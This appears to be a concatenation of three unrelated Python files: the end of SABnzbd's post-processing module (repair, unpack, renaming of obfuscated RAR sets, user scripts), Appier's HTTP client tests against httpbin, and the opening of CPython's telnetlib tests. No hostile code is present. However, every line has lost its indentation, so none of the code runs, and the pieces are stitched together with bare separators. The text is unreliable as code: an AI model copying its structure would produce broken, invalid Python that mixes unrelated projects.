emsg = T("Download might fail, only %s of required %s available") % (emsg, emsg2)
else:
emsg = T("Download failed - Not on your server(s)")
empty = True
emsg += " - https://sabnzbd.org/not-complete"
nzo.fail_msg = emsg
nzo.set_unpack_info("Fail", emsg)
nzo.status = Status.FAILED
# do not run unpacking or parity verification
flag_repair = flag_unpack = False
all_ok = cfg.empty_postproc() and empty
if not all_ok:
par_error = True
unpack_error = 1
script = nzo.script
logging.info(
"Starting Post-Processing on %s => Repair:%s, Unpack:%s, Delete:%s, Script:%s, Cat:%s",
filename,
flag_repair,
flag_unpack,
flag_delete,
script,
nzo.cat,
)
# Set complete dir to workdir in case we need to abort
workdir_complete = workdir
# Par processing, if enabled
if all_ok and flag_repair:
par_error, re_add = parring(nzo, workdir)
if re_add:
# Try to get more par files
return False
# If we don't need extra par2, we can disconnect
if sabnzbd.nzbqueue.NzbQueue.do.actives(grabs=False) == 0 and cfg.autodisconnect():
# This was the last job, close server connections
sabnzbd.downloader.Downloader.do.disconnect()
# Sanitize the resulting files
if sabnzbd.WIN32:
sanitize_files_in_folder(workdir)
# Check if user allows unsafe post-processing
if flag_repair and cfg.safe_postproc():
all_ok = all_ok and not par_error
if all_ok:
# Fix encodings
fix_unix_encoding(workdir)
# Use dirs generated by direct-unpacker
if nzo.direct_unpacker and nzo.direct_unpacker.unpack_dir_info:
(
tmp_workdir_complete,
workdir_complete,
file_sorter,
one_folder,
marker_file,
) = nzo.direct_unpacker.unpack_dir_info
else:
# Generate extraction path
tmp_workdir_complete, workdir_complete, file_sorter, one_folder, marker_file = prepare_extraction_path(
nzo
)
newfiles = []
# Run Stage 2: Unpack
if flag_unpack:
# Set the current nzo status to "Extracting...". Used in History
nzo.status = Status.EXTRACTING
logging.info("Running unpack_magic on %s", filename)
unpack_error, newfiles = unpack_magic(
nzo, workdir, tmp_workdir_complete, flag_delete, one_folder, (), (), (), (), ()
)
logging.info("Unpacked files %s", newfiles)
if sabnzbd.WIN32:
# Sanitize the resulting files
newfiles = sanitize_files_in_folder(tmp_workdir_complete)
logging.info("Finished unpack_magic on %s", filename)
if cfg.safe_postproc():
all_ok = all_ok and not unpack_error
if all_ok:
# Move any (left-over) files to destination
nzo.status = Status.MOVING
nzo.set_action_line(T("Moving"), "...")
for root, _dirs, files in os.walk(workdir):
if not root.endswith(JOB_ADMIN):
for file_ in files:
path = os.path.join(root, file_)
new_path = path.replace(workdir, tmp_workdir_complete)
ok, new_path = move_to_path(path, new_path)
if new_path:
newfiles.append(new_path)
if not ok:
nzo.set_unpack_info("Unpack", T("Failed moving %s to %s") % (path, new_path))
all_ok = False
break
# Set permissions right
set_permissions(tmp_workdir_complete)
if all_ok and marker_file:
del_marker(os.path.join(tmp_workdir_complete, marker_file))
remove_from_list(marker_file, newfiles)
if all_ok:
# Remove files matching the cleanup list
cleanup_list(tmp_workdir_complete, skip_nzb=True)
# Check if this is an NZB-only download, if so redirect to queue
# except when PP was Download-only
if flag_repair:
nzb_list = nzb_redirect(
tmp_workdir_complete, nzo.final_name, nzo.pp, script, nzo.cat, priority=nzo.priority
)
else:
nzb_list = None
if nzb_list:
nzo.set_unpack_info("Download", T("Sent %s to queue") % nzb_list)
cleanup_empty_directories(tmp_workdir_complete)
else:
# Full cleanup including nzb's
cleanup_list(tmp_workdir_complete, skip_nzb=False)
script_output = ""
script_ret = 0
if not nzb_list:
# Give destination its final name
if cfg.folder_rename() and tmp_workdir_complete and not one_folder:
if all_ok:
try:
newfiles = rename_and_collapse_folder(tmp_workdir_complete, workdir_complete, newfiles)
except:
logging.error(
T('Error renaming "%s" to "%s"'),
clip_path(tmp_workdir_complete),
clip_path(workdir_complete),
)
logging.info("Traceback: ", exc_info=True)
# Better disable sorting because filenames are all off now
file_sorter.sort_file = None
else:
workdir_complete = tmp_workdir_complete.replace("_UNPACK_", "_FAILED_")
workdir_complete = get_unique_path(workdir_complete, n=0, create_dir=False)
if empty:
job_result = -1
else:
job_result = int(par_error) + int(bool(unpack_error)) * 2
if cfg.ignore_samples():
remove_samples(workdir_complete)
# TV/Movie/Date Renaming code part 2 - rename and move files to parent folder
if all_ok and file_sorter.sort_file:
if newfiles:
file_sorter.rename(newfiles, workdir_complete)
workdir_complete, ok = file_sorter.move(workdir_complete)
else:
workdir_complete, ok = file_sorter.rename_with_ext(workdir_complete)
if not ok:
nzo.set_unpack_info("Unpack", T("Failed to move files"))
all_ok = False
# Run the user script
script_path = make_script_path(script)
if (all_ok or not cfg.safe_postproc()) and (not nzb_list) and script_path:
# Set the current nzo status to "Ext Script...". Used in History
nzo.status = Status.RUNNING
nzo.set_action_line(T("Running script"), script)
nzo.set_unpack_info("Script", T("Running user script %s") % script, unique=True)
script_log, script_ret = external_processing(
script_path, nzo, clip_path(workdir_complete), nzo.final_name, job_result
)
script_line = get_last_line(script_log)
if script_log:
script_output = nzo.nzo_id
if script_line:
nzo.set_unpack_info("Script", script_line, unique=True)
else:
nzo.set_unpack_info("Script", T("Ran %s") % script, unique=True)
else:
script = ""
script_line = ""
script_ret = 0
# Maybe bad script result should fail job
if script_ret and cfg.script_can_fail():
script_error = True
all_ok = False
nzo.fail_msg = T("Script exit code is %s") % script_ret
else:
script_error = False
# Email the results
if (not nzb_list) and cfg.email_endjob():
if (cfg.email_endjob() == 1) or (cfg.email_endjob() == 2 and (unpack_error or par_error or script_error)):
emailer.endjob(
nzo.final_name,
nzo.cat,
all_ok,
workdir_complete,
nzo.bytes_downloaded,
nzo.fail_msg,
nzo.unpack_info,
script,
script_log,
script_ret,
)
if script_output:
# Can do this only now, otherwise it would show up in the email
if script_ret:
script_ret = "Exit(%s) " % script_ret
else:
script_ret = ""
if len(script_log.rstrip().split("\n")) > 1:
nzo.set_unpack_info(
"Script",
'%s%s <a href="./scriptlog?name=%s">(%s)</a>'
% (script_ret, script_line, encoding.xml_name(script_output), T("More")),
unique=True,
)
else:
# No '(more)' button needed
nzo.set_unpack_info("Script", "%s%s " % (script_ret, script_line), unique=True)
# Cleanup again, including NZB files
if all_ok:
cleanup_list(workdir_complete, False)
# Force error for empty result
all_ok = all_ok and not empty
# Update indexer with results
if cfg.rating_enable():
if nzo.encrypted > 0:
Rating.do.update_auto_flag(nzo.nzo_id, Rating.FLAG_ENCRYPTED)
if empty:
hosts = [s.host for s in sabnzbd.downloader.Downloader.do.nzo_servers(nzo)]
if not hosts:
hosts = [None]
for host in hosts:
Rating.do.update_auto_flag(nzo.nzo_id, Rating.FLAG_EXPIRED, host)
except:
logging.error(T("Post Processing Failed for %s (%s)"), filename, T("see logfile"))
logging.info("Traceback: ", exc_info=True)
nzo.fail_msg = T("PostProcessing was aborted (%s)") % T("see logfile")
notifier.send_notification(T("Download Failed"), filename, "failed", nzo.cat)
nzo.status = Status.FAILED
par_error = True
all_ok = False
if cfg.email_endjob():
emailer.endjob(
nzo.final_name,
nzo.cat,
all_ok,
clip_path(workdir_complete),
nzo.bytes_downloaded,
nzo.fail_msg,
nzo.unpack_info,
"",
"",
0,
)
if all_ok:
# If the folder only contains one file OR folder, have that as the path
# Be aware that series/generic/date sorting may move a single file into a folder containing other files
workdir_complete = one_file_or_folder(workdir_complete)
workdir_complete = os.path.normpath(workdir_complete)
# Clean up the NZO data
try:
nzo.purge_data(delete_all_data=all_ok)
except:
logging.error(T("Cleanup of %s failed."), nzo.final_name)
logging.info("Traceback: ", exc_info=True)
# Use automatic retry link on par2 errors and encrypted/bad RARs
if par_error or unpack_error in (2, 3):
try_alt_nzb(nzo)
# Show final status in history
if all_ok:
notifier.send_notification(T("Download Completed"), filename, "complete", nzo.cat)
nzo.status = Status.COMPLETED
else:
notifier.send_notification(T("Download Failed"), filename, "failed", nzo.cat)
nzo.status = Status.FAILED
# Log the overall time taken for postprocessing
postproc_time = int(time.time() - start)
# Create the history DB instance
history_db = database.HistoryDB()
# Add the nzo to the database. Only the path, script and time taken is passed
# Other information is obtained from the nzo
history_db.add_history_db(nzo, clip_path(workdir_complete), nzo.downpath, postproc_time, script_log, script_line)
# Purge items
history_db.auto_history_purge()
# The connection is only used once, so close it here
history_db.close()
sabnzbd.history_updated()
return True
def prepare_extraction_path(nzo):
""" Based on the information that we have, generate
the extraction path and create the directory.
Separated so it can be called from DirectUnpacker
"""
one_folder = False
marker_file = None
# Determine class directory
catdir = config.get_categories(nzo.cat).dir()
if catdir.endswith("*"):
catdir = catdir.strip("*")
one_folder = True
complete_dir = real_path(cfg.complete_dir.get_path(), catdir)
complete_dir = long_path(complete_dir)
# TV/Movie/Date Renaming code part 1 - detect and construct paths
if cfg.enable_meta():
file_sorter = Sorter(nzo, nzo.cat)
else:
file_sorter = Sorter(None, nzo.cat)
complete_dir = file_sorter.detect(nzo.final_name, complete_dir)
if file_sorter.sort_file:
one_folder = False
complete_dir = sanitize_and_trim_path(complete_dir)
if one_folder:
workdir_complete = create_all_dirs(complete_dir, umask=True)
else:
workdir_complete = get_unique_path(os.path.join(complete_dir, nzo.final_name), create_dir=True)
marker_file = set_marker(workdir_complete)
if not workdir_complete or not os.path.exists(workdir_complete):
logging.error(T("Cannot create final folder %s") % os.path.join(complete_dir, nzo.final_name))
raise IOError
if cfg.folder_rename() and not one_folder:
prefixed_path = prefix(workdir_complete, "_UNPACK_")
tmp_workdir_complete = get_unique_path(prefix(workdir_complete, "_UNPACK_"), create_dir=False)
try:
renamer(workdir_complete, tmp_workdir_complete)
except:
pass # On failure, just use the original name
# Is the unique path different? Then we also need to modify the final path
if prefixed_path != tmp_workdir_complete:
workdir_complete = workdir_complete + os.path.splitext(tmp_workdir_complete)[1]
else:
tmp_workdir_complete = workdir_complete
return tmp_workdir_complete, workdir_complete, file_sorter, one_folder, marker_file
def parring(nzo, workdir):
""" Perform par processing. Returns: (par_error, re_add) """
job_name = nzo.final_name
notifier.send_notification(T("Post-processing"), job_name, "pp", nzo.cat)
logging.info("Starting verification and repair of %s", job_name)
# Get verification status of sets
verified = sabnzbd.load_data(VERIFIED_FILE, nzo.workpath, remove=False) or {}
re_add = False
par_error = False
single = len(nzo.extrapars) == 1
if nzo.extrapars:
# Need to make a copy because it can change during iteration
for setname in list(nzo.extrapars):
if cfg.ignore_samples() and RE_SAMPLE.search(setname.lower()):
continue
# Skip sets that were already tried
if not verified.get(setname, False):
logging.info("Running verification and repair on set %s", setname)
parfile_nzf = nzo.partable[setname]
# Check if file maybe wasn't deleted and if we maybe have more files in the parset
if os.path.exists(os.path.join(nzo.downpath, parfile_nzf.filename)) or nzo.extrapars[setname]:
need_re_add, res = par2_repair(parfile_nzf, nzo, workdir, setname, single=single)
# Was it aborted?
if not nzo.pp_active:
re_add = False
par_error = True
break
re_add = re_add or need_re_add
verified[setname] = res
else:
continue
par_error = par_error or not res
elif not verified.get("", False):
# No par2-sets found, skipped if already tried before
logging.info("No par2 sets for %s", job_name)
nzo.set_unpack_info("Repair", T("[%s] No par2 sets") % job_name)
# Try SFV-based verification and rename
sfv_check_result = None
if cfg.sfv_check() and not verified.get("", False):
sfv_check_result = try_sfv_check(nzo, workdir)
par_error = sfv_check_result is False
# If no luck with SFV, do RAR-check or RAR-rename
if sfv_check_result is None and cfg.enable_unrar():
_, _, rars, _, _ = build_filelists(workdir)
# If there's no RAR's, they might be super-obfuscated
if not rars:
# Returns number of renamed RAR's
if rar_renamer(nzo, workdir):
# Re-parse the files so we can do RAR-check
_, _, rars, _, _ = build_filelists(workdir)
if rars:
par_error = not try_rar_check(nzo, rars)
# Save that we already tried SFV/RAR-verification
verified[""] = not par_error
if re_add:
logging.info("Re-added %s to queue", job_name)
if nzo.priority != TOP_PRIORITY:
nzo.priority = REPAIR_PRIORITY
nzo.status = Status.FETCHING
sabnzbd.nzbqueue.NzbQueue.do.add(nzo)
sabnzbd.downloader.Downloader.do.resume_from_postproc()
sabnzbd.save_data(verified, VERIFIED_FILE, nzo.workpath)
logging.info("Verification and repair finished for %s", job_name)
return par_error, re_add
def try_sfv_check(nzo, workdir):
""" Attempt to verify set using SFV file
Return None if no SFV-sets, True/False based on verification
"""
# Get list of SFV names
sfvs = globber_full(workdir, "*.sfv")
# If no files named *.sfv, lets search for obfuscated SFV files
if not sfvs:
files = globber_full(workdir, "*")
for file in files:
if is_sfv_file(file):
logging.debug("Found and will use obfuscated SFV file: %s", file)
sfvs.append(file)
if not sfvs:
# still no SFV, so:
return None
result = sfv_check(sfvs, nzo, workdir)
if not result:
print_sfv = [os.path.basename(sfv) for sfv in sfvs]
fail_msg = T('Some files failed to verify against "%s"') % "; ".join(print_sfv)
nzo.set_unpack_info("Repair", fail_msg)
nzo.status = Status.FAILED
nzo.fail_msg = fail_msg
return False
# Success
nzo.set_unpack_info("Repair", T("Verified successfully using SFV files"))
return True
def try_rar_check(nzo, rars):
""" Attempt to verify set using the RARs
Return True if verified, False when failed
When setname is '', all RAR files will be used, otherwise only the matching one
If no RAR's are found, returns True
"""
# Sort for better processing
rars.sort(key=functools.cmp_to_key(rar_sort))
# Test
if rars:
setname = setname_from_path(rars[0])
nzo.status = Status.VERIFYING
nzo.set_unpack_info("Repair", T("Trying RAR-based verification"), setname)
nzo.set_action_line(T("Trying RAR-based verification"), "...")
try:
# Set path to unrar and open the file
# Requires de-unicode for RarFile to work!
rarfile.UNRAR_TOOL = sabnzbd.newsunpack.RAR_COMMAND
zf = rarfile.RarFile(rars[0])
# Skip if it's encrypted
if zf.needs_password():
msg = T("[%s] RAR-based verification failed: %s") % (setname, T("Passworded"))
nzo.set_unpack_info("Repair", msg)
return True
# Will throw exception if something is wrong
zf.testrar()
# Success!
msg = T("RAR files verified successfully")
nzo.set_unpack_info("Repair", msg, setname)
logging.info(msg)
return True
except rarfile.Error as e:
nzo.fail_msg = T("RAR files failed to verify")
msg = T("[%s] RAR-based verification failed: %s") % (setname, e)
nzo.set_unpack_info("Repair", msg, setname)
logging.info(msg)
return False
else:
# No rar-files, so just continue
return True
def rar_renamer(nzo, workdir):
""" Deobfuscate rar file names: Use header and content information to give RAR-files decent names """
nzo.status = Status.VERIFYING
nzo.set_unpack_info("Repair", T("Trying RAR-based verification"))
nzo.set_action_line(T("Trying RAR-based verification"), "...")
renamed_files = 0
# This is the most important datastructure (in case of mixed obfuscated rarsets)
rarvolnr = {}
# rarvolnr will contain per rar vol number the rarfilenames and their respective contents (and maybe other characteristics, like filesizes).
# for example: rarvolnr[6]['somerandomfilename.rar']={'readme.txt', 'linux.iso'},
# which means 'somerandomfilename.rar' has rarvolnumber 6, and contents 'readme.txt' and 'linux.iso'
# if we find a rarfile with rarvolnumber 7, and 'linux.iso' in it, we have a match!
# The volume number and real extension of a (obfuscated) rar file
# so volnrext['dfakjldfalkjdfl.blabla'] = (14, 'part014.rar') or (2, 'r000')
# Not really needed, but handy to avoid a second lookup at the renaming
volnrext = {}
# Scan rar files in workdir, but not subdirs
workdir_files = os.listdir(workdir)
for file_to_check in workdir_files:
file_to_check = os.path.join(workdir, file_to_check)
# We only want files:
if not (os.path.isfile(file_to_check)):
continue
# The function will check if it's a RAR-file
# We do a sanity-check for the returned number
rar_vol, new_extension = rarvolinfo.get_rar_extension(file_to_check)
if 0 < rar_vol < 1000:
logging.debug("Detected volume-number %s from RAR-header: %s ", rar_vol, file_to_check)
volnrext[file_to_check] = (rar_vol, new_extension)
# The files inside rar file
rar_contents = rarfile.RarFile(os.path.join(workdir, file_to_check), single_file_check=True).filelist()
try:
rarvolnr[rar_vol]
except:
# does not yet exist, so create:
rarvolnr[rar_vol] = {}
rarvolnr[rar_vol][file_to_check] = rar_contents # store them for matching (if needed)
else:
logging.debug("No RAR-volume-number found in %s", file_to_check)
logging.debug("Deobfuscate: rarvolnr is: %s", rarvolnr)
logging.debug("Deobfuscate: volnrext is: %s", volnrext)
# Could be that there are no rar-files, we stop
if not len(rarvolnr):
return renamed_files
# Check number of different obfuscated rar sets:
numberofrarsets = len(rarvolnr[1])
if numberofrarsets == 1:
# Just one obfuscated rarset
logging.debug("Deobfuscate: Just one obfuscated rarset")
for filename in volnrext:
new_rar_name = "%s.%s" % (nzo.final_name, volnrext[filename][1])
new_rar_name = os.path.join(workdir, new_rar_name)
new_rar_name = get_unique_filename(new_rar_name)
logging.debug("Deobfuscate: Renaming %s to %s" % (filename, new_rar_name))
renamer(filename, new_rar_name)
renamed_files += 1
else:
# More than one obfuscated rarset, so we must do matching based of files inside the rar files
logging.debug("Number of obfuscated rarsets: %s", numberofrarsets)
# Assign (random) rar set names
rarsetname = {} # in which rar set it should be, so rar set 'A', or 'B', or ...
mychar = "A"
# First things first: Assigning a rarsetname to the rar file which have volume number 1
for base_obfuscated_filename in rarvolnr[1]:
rarsetname[base_obfuscated_filename] = mychar + "--" + nzo.final_name
mychar = chr(ord(mychar) + 1)
logging.debug("Deobfuscate: rarsetname %s", rarsetname)
# Do the matching, layer by layer (read: rarvolnumber)
# So, all rar files with rarvolnr 1, find the contents (files inside the rar),
# and match with rarfiles with rarvolnr 2, and put them in the correct rarset.
# And so on, until the highest rarvolnr minus 1 matched against highest rarvolnr
for n in range(1, len(rarvolnr.keys())):
logging.debug("Deobfuscate: Finding matches between rar sets %s and %s" % (n, n + 1))
for base_obfuscated_filename in rarvolnr[n]:
matchcounter = 0
for next_obfuscated_filename in rarvolnr[n + 1]:
# set() method with intersection (less strict): set(rarvolnr[n][base_obfuscated_filename]).intersection(set(rarvolnr[n+1][next_obfuscated_filename]))
# check if the last filename inside the existing rar matches with the first filename in the following rar
if rarvolnr[n][base_obfuscated_filename][-1] == rarvolnr[n + 1][next_obfuscated_filename][0]:
try:
rarsetname[next_obfuscated_filename] = rarsetname[base_obfuscated_filename]
matchcounter += 1
except KeyError:
logging.warning("No matching earlier rar file for %s", next_obfuscated_filename)
if matchcounter > 1:
logging.info("Deobfuscate: more than one match, so risk on false positive matching.")
# Do the renaming:
for filename in rarsetname:
new_rar_name = "%s.%s" % (rarsetname[filename], volnrext[filename][1])
new_rar_name = os.path.join(workdir, new_rar_name)
new_rar_name = get_unique_filename(new_rar_name)
logging.debug("Deobfuscate: Renaming %s to %s" % (filename, new_rar_name))
renamer(filename, new_rar_name)
renamed_files += 1
# Done: The obfuscated rar files have now been renamed to regular formatted filenames
return renamed_files
def handle_empty_queue():
""" Check if empty queue calls for action """
if sabnzbd.nzbqueue.NzbQueue.do.actives() == 0:
sabnzbd.save_state()
notifier.send_notification("SABnzbd", T("Queue finished"), "queue_done")
# Perform end-of-queue action when one is set
if sabnzbd.QUEUECOMPLETEACTION:
logging.info(
"Queue has finished, launching: %s (%s)", sabnzbd.QUEUECOMPLETEACTION, sabnzbd.QUEUECOMPLETEARG
)
if sabnzbd.QUEUECOMPLETEARG:
sabnzbd.QUEUECOMPLETEACTION(sabnzbd.QUEUECOMPLETEARG)
else:
Thread(target=sabnzbd.QUEUECOMPLETEACTION).start()
sabnzbd.change_queue_complete_action(cfg.queue_complete(), new=False)
def cleanup_list(wdir, skip_nzb):
""" Remove all files whose extension matches the cleanup list,
optionally ignoring the nzb extension
"""
if cfg.cleanup_list():
try:
files = os.listdir(wdir)
except:
files = ()
for filename in files:
path = os.path.join(wdir, filename)
if os.path.isdir(path):
cleanup_list(path, skip_nzb)
else:
if on_cleanup_list(filename, skip_nzb):
try:
logging.info("Removing unwanted file %s", path)
remove_file(path)
except:
logging.error(T("Removing %s failed"), clip_path(path))
logging.info("Traceback: ", exc_info=True)
if files:
# If directories only contained unwanted files, remove them
cleanup_empty_directories(wdir)
def prefix(path, pre):
""" Apply prefix to last part of path
'/my/path' and 'hi_' will give '/my/hi_path'
"""
p, d = os.path.split(path)
return os.path.join(p, pre + d)
def nzb_redirect(wdir, nzbname, pp, script, cat, priority):
""" Check if this job contains only NZB files,
if so send to queue and remove if on clean-up list
Returns list of processed NZB's
"""
files = recursive_listdir(wdir)
for file_ in files:
if os.path.splitext(file_)[1].lower() != ".nzb":
return None
# For multiple NZBs, cannot use the current job name
if len(files) != 1:
nzbname = None
# Process all NZB files
for nzb_file in files:
dirscanner.process_single_nzb(
os.path.split(nzb_file)[1],
file_,
pp,
script,
cat,
priority=priority,
keep=False,
dup_check=False,
nzbname=nzbname,
)
return files
def one_file_or_folder(folder):
""" If the dir only contains one file or folder, join that file/folder onto the path """
if os.path.exists(folder) and os.path.isdir(folder):
try:
cont = os.listdir(folder)
if len(cont) == 1:
folder = os.path.join(folder, cont[0])
folder = one_file_or_folder(folder)
except OSError:
# Can occur on paths it doesn't like, for example "C:"
pass
return folder
TAG_RE = re.compile(r"<[^>]+>")
def get_last_line(txt):
""" Return last non-empty line of a text, trim to 150 max """
# First we remove HTML code in a basic way
txt = TAG_RE.sub(" ", txt)
# Then we get the last line
lines = txt.split("\n")
n = len(lines) - 1
while n >= 0 and not lines[n].strip("\r\t "):
n = n - 1
line = lines[n].strip("\r\t ")
if len(line) >= 150:
line = line[:147] + "..."
return line
def remove_samples(path):
""" Remove all files that match the sample pattern
Skip deleting if it matches all files or there is only 1 file
"""
files_to_delete = []
nr_files = 0
for root, _dirs, files in os.walk(path):
for file_to_match in files:
nr_files += 1
if RE_SAMPLE.search(file_to_match):
files_to_delete.append(os.path.join(root, file_to_match))
# Make sure we skip false-positives
if len(files_to_delete) < nr_files:
for path in files_to_delete:
try:
logging.info("Removing unwanted sample file %s", path)
remove_file(path)
except:
logging.error(T("Removing %s failed"), clip_path(path))
logging.info("Traceback: ", exc_info=True)
else:
logging.info("Skipping sample-removal, false-positive")
def rename_and_collapse_folder(oldpath, newpath, files):
""" Rename folder, collapsing when there's just a single subfolder
oldpath --> newpath OR oldpath/subfolder --> newpath
Modify list of filenames accordingly
"""
orgpath = oldpath
items = globber(oldpath)
if len(items) == 1:
folder = items[0]
folder_path = os.path.join(oldpath, folder)
if os.path.isdir(folder_path) and folder not in ("VIDEO_TS", "AUDIO_TS"):
logging.info("Collapsing %s", os.path.join(newpath, folder))
oldpath = folder_path
oldpath = os.path.normpath(oldpath)
newpath = os.path.normpath(newpath)
files = [os.path.normpath(f).replace(oldpath, newpath) for f in files]
renamer(oldpath, newpath)
try:
remove_dir(orgpath)
except:
pass
return files
def set_marker(folder):
""" Set marker file and return name """
name = cfg.marker_file()
if name:
path = os.path.join(folder, name)
logging.debug("Create marker file %s", path)
try:
fp = open(path, "w")
fp.close()
except:
logging.info("Cannot create marker file %s", path)
logging.info("Traceback: ", exc_info=True)
name = None
return name
def del_marker(path):
""" Remove marker file """
if path and os.path.exists(path):
logging.debug("Removing marker file %s", path)
try:
remove_file(path)
except:
logging.info("Cannot remove marker file %s", path)
logging.info("Traceback: ", exc_info=True)
def remove_from_list(name, lst):
if name:
for n in range(len(lst)):
if lst[n].endswith(name):
logging.debug("Popping %s", lst[n])
lst.pop(n)
return
def try_alt_nzb(nzo):
""" Try to get a new NZB if available """
url = nzo.nzo_info.get("failure")
if url and cfg.new_nzb_on_failure():
sabnzbd.add_url(url, nzo.pp, nzo.script, nzo.cat, nzo.priority)
|
http.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Hive Appier Framework
# Copyright (c) 2008-2021 Hive Solutions Lda.
#
# This file is part of Hive Appier Framework.
#
# Hive Appier Framework is free software: you can redistribute it and/or modify
# it under the terms of the Apache License as published by the Apache
# Foundation, either version 2.0 of the License, or (at your option) any
# later version.
#
# Hive Appier Framework is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Apache License for more details.
#
# You should have received a copy of the Apache License along with
# Hive Appier Framework. If not, see <http://www.apache.org/licenses/>.
__author__ = "João Magalhães <joamag@hive.pt>"
""" The author(s) of the module """
__version__ = "1.0.0"
""" The version of the module """
__revision__ = "$LastChangedRevision$"
""" The revision number of the module """
__date__ = "$LastChangedDate$"
""" The last change date of the module """
__copyright__ = "Copyright (c) 2008-2021 Hive Solutions Lda."
""" The copyright for the module """
__license__ = "Apache License, Version 2.0"
""" The license for the module """
import unittest
import threading
import appier
class HTTPTest(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
self.httpbin = appier.conf("HTTPBIN", "httpbin.org")
def test_parse_url(self):
url, scheme, host, authorization, params = appier.http._parse_url("http://hive.pt/")
self.assertEqual(url, "http://hive.pt:80/")
self.assertEqual(scheme, "http")
self.assertEqual(host, "hive.pt")
self.assertEqual(authorization, None)
self.assertEqual(params, {})
url, scheme, host, authorization, params = appier.http._parse_url("http://username@hive.pt/")
self.assertEqual(url, "http://hive.pt:80/")
self.assertEqual(scheme, "http")
self.assertEqual(host, "hive.pt")
self.assertEqual(authorization, None)
self.assertEqual(params, {})
url, scheme, host, authorization, params = appier.http._parse_url("http://username:password@hive.pt/")
self.assertEqual(url, "http://hive.pt:80/")
self.assertEqual(scheme, "http")
self.assertEqual(host, "hive.pt")
self.assertEqual(authorization, "dXNlcm5hbWU6cGFzc3dvcmQ=")
self.assertEqual(params, {})
url, scheme, host, authorization, params = appier.http._parse_url("http://username:password@hive.pt/hello/world")
self.assertEqual(url, "http://hive.pt:80/hello/world")
self.assertEqual(scheme, "http")
self.assertEqual(host, "hive.pt")
self.assertEqual(authorization, "dXNlcm5hbWU6cGFzc3dvcmQ=")
self.assertEqual(params, {})
url, scheme, host, authorization, params = appier.http._parse_url("http://username:password@hive.pt/hello/world?hello=world")
self.assertEqual(url, "http://hive.pt:80/hello/world")
self.assertEqual(scheme, "http")
self.assertEqual(host, "hive.pt")
self.assertEqual(authorization, "dXNlcm5hbWU6cGFzc3dvcmQ=")
self.assertEqual(params, dict(hello = ["world"]))
def test_redirect(self):
_data, response = appier.get(
"https://%s/redirect-to" % self.httpbin ,
params = dict(url = "https://%s/" % self.httpbin),
handle = True,
redirect = True
)
code = response.getcode()
self.assertNotEqual(code, 302)
self.assertEqual(code, 200)
quoted = appier.legacy.quote("https://%s/" % self.httpbin)
_data, response = appier.get(
"https://%s/redirect-to?url=%s" % (self.httpbin, quoted),
handle = True,
redirect = True
)
code = response.getcode()
self.assertNotEqual(code, 302)
self.assertEqual(code, 200)
_data, response = appier.get(
"https://%s/relative-redirect/2" % self.httpbin ,
handle = True,
redirect = True
)
code = response.getcode()
self.assertNotEqual(code, 302)
self.assertEqual(code, 200)
def test_timeout(self):
self.assertRaises(
BaseException,
lambda: appier.get(
"https://%s/delay/3" % self.httpbin,
handle = True,
redirect = True,
timeout = 1
)
)
data, response = appier.get(
"https://%s/delay/1" % self.httpbin,
handle = True,
redirect = True,
timeout = 30
)
code = response.getcode()
self.assertEqual(code, 200)
self.assertNotEqual(len(data), 0)
self.assertNotEqual(data, None)
def test_get_f(self):
file = appier.get_f("https://%s/image/png" % self.httpbin)
self.assertEqual(file.file_name, "default")
self.assertEqual(file.mime, "image/png")
self.assertEqual(len(file.data) > 100, True)
self.assertEqual(len(file.data_b64) > 100, True)
file = appier.get_f(
"https://%s/image/png" % self.httpbin,
name = "dummy"
)
self.assertEqual(file.file_name, "dummy")
self.assertEqual(file.mime, "image/png")
self.assertEqual(len(file.data) > 100, True)
self.assertEqual(len(file.data_b64) > 100, True)
def test_generator(self):
def text_g(message = [b"hello", b" ", b"world"]):
yield sum(len(value) for value in message)
for value in message:
yield value
data, response = appier.post(
"https://%s/post" % self.httpbin,
data = text_g(),
handle = True,
reuse = False
)
code = response.getcode()
self.assertNotEqual(code, 302)
self.assertEqual(code, 200)
self.assertEqual(data["data"], "hello world")
def test_file(self):
data, response = appier.post(
"https://%s/post" % self.httpbin,
data = appier.legacy.BytesIO(b"hello world"),
handle = True,
reuse = False
)
code = response.getcode()
self.assertNotEqual(code, 302)
self.assertEqual(code, 200)
self.assertEqual(data["data"], "hello world")
def test_multithread(self):
threads = []
results = []
for index in range(10):
result = dict()
results.append(result)
def generate(index):
def caller():
data, response = appier.get(
"https://%s/ip" % self.httpbin,
handle = True
)
result = results[index]
result["data"] = data
result["response"] = response
return caller
callable = generate(index)
thread = threading.Thread(target = callable, name = "TestMultithread")
thread.start()
threads.append(thread)
for thread, result in zip(threads, results):
thread.join()
response = result["response"]
code = response.getcode()
self.assertNotEqual(code, 302)
self.assertEqual(code, 200)
def test_error(self):
self.assertRaises(
appier.HTTPError,
lambda: appier.get("https://%s/status/404" % self.httpbin)
)
def test_invalid(self):
self.assertRaises(
BaseException,
lambda: appier.get("https://invalidlargedomain.org/")
)
|
test_telnetlib.py | import socket
import selectors
import telnetlib
import threading
import contextlib
from test import support
import unittest
HOST = support.HOST
def server(evt, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
conn.close()
except socket.timeout:
pass
finally:
serv.close()
class GeneralTests(unittest.TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(60) # Safety net. Look issue 11812
self.port = support.bind_port(self.sock)
self.thread = threading.Thread(target=server, args=(self.evt,self.sock))
self.thread.setDaemon(True)
self.thread.start()
self.evt.wait()
def tearDown(self):
self.thread.join()
del self.thread # Clear out any dangling Thread objects.
def testBasic(self):
# connects
telnet = telnetlib.Telnet(HOST, self.port)
telnet.sock.close()
def testContextManager(self):
with telnetlib.Telnet(HOST, self.port) as tn:
self.assertIsNotNone(tn.get_socket())
self.assertIsNone(tn.get_socket())
def testTimeoutDefault(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
telnet = telnetlib.Telnet(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testTimeoutNone(self):
# None, having other default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
telnet = telnetlib.Telnet(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(telnet.sock.gettimeout() is None)
